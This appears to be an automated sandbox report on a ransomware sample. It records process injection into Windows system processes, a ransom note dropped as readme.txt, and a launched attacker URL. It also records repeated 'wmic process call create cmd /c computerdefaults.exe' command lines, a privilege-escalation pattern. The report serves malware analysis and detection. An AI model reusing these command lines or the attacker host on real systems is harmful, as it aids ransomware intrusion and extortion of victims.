Explorer.EXEMicrosoftEdge.exe

pid	Process
2060	Explorer.EXE
2212	MicrosoftEdge.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
2060	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.execmd.execmd.exesvchost.execmd.exeExplorer.EXEcmd.exetaskhostw.exeRuntimeBroker.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2408 wrote to memory of 4484	2408	sihost.exe	70
PID 2408 wrote to memory of 4484	2408	sihost.exe	70
PID 2408 wrote to memory of 3164	2408	sihost.exe	72
PID 2408 wrote to memory of 3164	2408	sihost.exe	72
PID 2408 wrote to memory of 3692	2408	sihost.exe	73
PID 2408 wrote to memory of 3692	2408	sihost.exe	73
PID 2408 wrote to memory of 4056	2408	sihost.exe	74
PID 2408 wrote to memory of 4056	2408	sihost.exe	74
PID 4056 wrote to memory of 500	4056	cmd.exe	79
PID 4056 wrote to memory of 500	4056	cmd.exe	79
PID 3692 wrote to memory of 644	3692	cmd.exe	78
PID 3692 wrote to memory of 644	3692	cmd.exe	78
PID 2424 wrote to memory of 920	2424	svchost.exe	80
PID 2424 wrote to memory of 920	2424	svchost.exe	80
PID 2424 wrote to memory of 1020	2424	svchost.exe	81
PID 2424 wrote to memory of 1020	2424	svchost.exe	81
PID 920 wrote to memory of 1708	920	cmd.exe	84
PID 920 wrote to memory of 1708	920	cmd.exe	84
PID 2060 wrote to memory of 1948	2060	Explorer.EXE	86
PID 2060 wrote to memory of 1948	2060	Explorer.EXE	86
PID 2060 wrote to memory of 2156	2060	Explorer.EXE	87
PID 2060 wrote to memory of 2156	2060	Explorer.EXE	87
PID 1020 wrote to memory of 2632	1020	cmd.exe	90
PID 1020 wrote to memory of 2632	1020	cmd.exe	90
PID 2704 wrote to memory of 3468	2704	taskhostw.exe	91
PID 2704 wrote to memory of 3468	2704	taskhostw.exe	91
PID 2704 wrote to memory of 1736	2704	taskhostw.exe	98
PID 2704 wrote to memory of 1736	2704	taskhostw.exe	98
PID 3460 wrote to memory of 4968	3460	RuntimeBroker.exe	99
PID 3460 wrote to memory of 4968	3460	RuntimeBroker.exe	99
PID 3460 wrote to memory of 5016	3460	RuntimeBroker.exe	100
PID 3460 wrote to memory of 5016	3460	RuntimeBroker.exe	100
PID 3572 wrote to memory of 4952	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 3572 wrote to memory of 4952	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 3572 wrote to memory of 1472	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	106
PID 3572 wrote to memory of 1472	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	106
PID 2156 wrote to memory of 4332	2156	cmd.exe	107
PID 2156 wrote to memory of 4332	2156	cmd.exe	107
PID 1948 wrote to memory of 4444	1948	cmd.exe	108
PID 1948 wrote to memory of 4444	1948	cmd.exe	108
PID 2796 wrote to memory of 5048	2796	cmd.exe	109
PID 2796 wrote to memory of 5048	2796	cmd.exe	109
PID 4596 wrote to memory of 2832	4596	cmd.exe	110
PID 4596 wrote to memory of 2832	4596	cmd.exe	110
PID 5016 wrote to memory of 5100	5016	cmd.exe	111
PID 5016 wrote to memory of 5100	5016	cmd.exe	111
PID 3468 wrote to memory of 540	3468	cmd.exe	112
PID 3468 wrote to memory of 540	3468	cmd.exe	112
PID 1736 wrote to memory of 604	1736	cmd.exe	113
PID 1736 wrote to memory of 604	1736	cmd.exe	113
PID 1472 wrote to memory of 3584	1472	cmd.exe	114
PID 1472 wrote to memory of 3584	1472	cmd.exe	114
PID 4968 wrote to memory of 2416	4968	cmd.exe	115
PID 4968 wrote to memory of 2416	4968	cmd.exe	115
PID 4952 wrote to memory of 4824	4952	cmd.exe	116
PID 4952 wrote to memory of 4824	4952	cmd.exe	116
PID 5064 wrote to memory of 1244	5064	cmd.exe	119
PID 5064 wrote to memory of 1244	5064	cmd.exe	119
PID 2384 wrote to memory of 1644	2384	cmd.exe	122
PID 2384 wrote to memory of 1644	2384	cmd.exe	122
PID 1480 wrote to memory of 2072	1480	cmd.exe	133
PID 1480 wrote to memory of 2072	1480	cmd.exe	133
PID 1076 wrote to memory of 2724	1076	cmd.exe	128
PID 1076 wrote to memory of 2724	1076	cmd.exe	128

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3572
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4824
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3584
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4444
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4332

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3796
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3796 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4336

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2416
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5100

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2704
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3468
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:540
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2424
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:920
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1708
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1020
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2632

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2408
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4484
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://0e044ed8a25852801eltalkfzj.jobsbig.cam/eltalkfzj^&1^&41345287^&71^&279^&2215063"
  2⤵
  - Checks computer location settings
  PID:3164
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:644
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4056
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:500

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5048

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2832

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1244

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1644

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2724

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2072

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3060
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4204

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2948
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3136

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4496
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3776

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2504
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3888

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3712
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4000

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4812
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2212

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2640

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1288

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
9cf2cbccaf378d00c83bdf2376563e87

SHA1
d6db48e7a6083ce7db8b2be5e3dc45af2bd12221

SHA256
c4900f187c4b6a9461c4a7459cda896d4e9625280f36a87a25d9b73932c35733

SHA512
10499f57069c04f7fd82cce644088572284631af3eab4898aa477767dc0f9bef42e4b18ff268ddb8d6bff4ee639f6f3972bd34db6f8c05c3e999adfb8375b85b

Download Submit
memory/500-136-0x0000000000000000-mapping.dmp

Download
memory/540-155-0x0000000000000000-mapping.dmp

Download
memory/604-157-0x0000000000000000-mapping.dmp

Download
memory/644-137-0x0000000000000000-mapping.dmp

Download
memory/920-138-0x0000000000000000-mapping.dmp

Download
memory/1020-139-0x0000000000000000-mapping.dmp

Download
memory/1244-161-0x0000000000000000-mapping.dmp

Download
memory/1472-149-0x0000000000000000-mapping.dmp

Download
memory/1644-162-0x0000000000000000-mapping.dmp

Download
memory/1708-140-0x0000000000000000-mapping.dmp

Download
memory/1736-145-0x0000000000000000-mapping.dmp

Download
memory/1948-141-0x0000000000000000-mapping.dmp

Download
memory/2072-163-0x0000000000000000-mapping.dmp

Download
memory/2156-142-0x0000000000000000-mapping.dmp

Download
memory/2408-130-0x0000016FD2CA0000-0x0000016FD2CA4000-memory.dmp

Filesize
16KB

Download
memory/2416-159-0x0000000000000000-mapping.dmp

Download
memory/2632-143-0x0000000000000000-mapping.dmp

Download
memory/2724-164-0x0000000000000000-mapping.dmp

Download
memory/2832-153-0x0000000000000000-mapping.dmp

Download
memory/3136-169-0x0000000000000000-mapping.dmp

Download
memory/3164-133-0x0000000000000000-mapping.dmp

Download
memory/3468-144-0x0000000000000000-mapping.dmp

Download
memory/3572-121-0x0000014BC6F00000-0x0000014BC6F01000-memory.dmp

Filesize
4KB

Download
memory/3572-123-0x0000014BC7570000-0x0000014BC7571000-memory.dmp

Filesize
4KB

Download
memory/3572-127-0x0000014BC75D0000-0x0000014BC75D1000-memory.dmp

Filesize
4KB

Download
memory/3572-126-0x0000014BC75C0000-0x0000014BC75C1000-memory.dmp

Filesize
4KB

Download
memory/3572-128-0x0000014BC75E0000-0x0000014BC75E1000-memory.dmp

Filesize
4KB

Download
memory/3572-119-0x0000014BC6EE0000-0x0000014BC6EE1000-memory.dmp

Filesize
4KB

Download
memory/3572-120-0x0000014BC6EF0000-0x0000014BC6EF1000-memory.dmp

Filesize
4KB

Download
memory/3572-118-0x0000014BC54F0000-0x0000014BC54F6000-memory.dmp

Filesize
24KB

Download
memory/3572-124-0x0000014BC7580000-0x0000014BC7581000-memory.dmp

Filesize
4KB

Download
memory/3572-122-0x0000014BC6F10000-0x0000014BC6F11000-memory.dmp

Filesize
4KB

Download
memory/3572-125-0x0000014BC7590000-0x0000014BC7591000-memory.dmp

Filesize
4KB

Download
memory/3572-156-0x0000014BC7BE0000-0x0000014BC7BE1000-memory.dmp

Filesize
4KB

Download
memory/3572-129-0x0000014BC75F0000-0x0000014BC75F1000-memory.dmp

Filesize
4KB

Download
memory/3584-158-0x0000000000000000-mapping.dmp

Download
memory/3692-134-0x0000000000000000-mapping.dmp

Download
memory/3696-170-0x0000000000000000-mapping.dmp

Download
memory/3776-165-0x0000000000000000-mapping.dmp

Download
memory/3888-166-0x0000000000000000-mapping.dmp

Download
memory/4000-168-0x0000000000000000-mapping.dmp

Download
memory/4056-135-0x0000000000000000-mapping.dmp

Download
memory/4204-167-0x0000000000000000-mapping.dmp

Download
memory/4332-150-0x0000000000000000-mapping.dmp

Download
memory/4444-151-0x0000000000000000-mapping.dmp

Download
memory/4484-131-0x0000000000000000-mapping.dmp

Download
memory/4824-160-0x0000000000000000-mapping.dmp

Download
memory/4952-148-0x0000000000000000-mapping.dmp

Download
memory/4968-146-0x0000000000000000-mapping.dmp

Download
memory/5016-147-0x0000000000000000-mapping.dmp

Download
memory/5048-152-0x0000000000000000-mapping.dmp

Download
memory/5100-154-0x0000000000000000-mapping.dmp

Download